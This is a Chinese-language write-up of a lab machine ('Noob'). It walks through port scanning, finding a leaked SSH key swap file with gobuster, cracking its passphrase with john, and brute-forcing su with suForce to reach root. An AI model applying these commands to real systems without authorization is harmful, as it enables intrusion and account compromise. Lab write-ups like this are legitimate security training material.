# 靶场搭建
下载:Noob
Nat,IP: 192.168.1.135
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Apache2 Debian Default Page: It works | |
|_http-server-header: Apache/2.4.56 (Debian) |
nikto 发现 notes.txt ,打开看了提示,应该是 swp 泄露吧,扫一下看看
Fuck! | |
configuring SSH, I closed the editor by mistake and lost the key.. I can't find it | |
Diego |
扫一下 swap
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.1.135/' -x bak,backup,tmp,save,swp -t 100
发现 id_rsa.swp
弄下来尝试登录,要密码,john 解一下
┌──(root㉿kali)-[~] | |
└─# ssh2john id_rsa > id_rsa.hash | |
┌──(root㉿kali)-[~] | |
└─# john --format=SSH id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt |
得到密码 sandiego ,前面的 notes.txt 中知道了用户名叫 diego 。
登录拿到 shell
# 提权
无语了,啥东西也找不到。看了 wp,爆破 su?
TMD 爆破!技术含量 = 0
开源爆破项目:suForce
跑出来密码是: rootbeer
拿到 root 的 shell
# 小结
需要总结字典吧,这种靶场还是老外用的多,实战可能需要总结适合需求的字典。
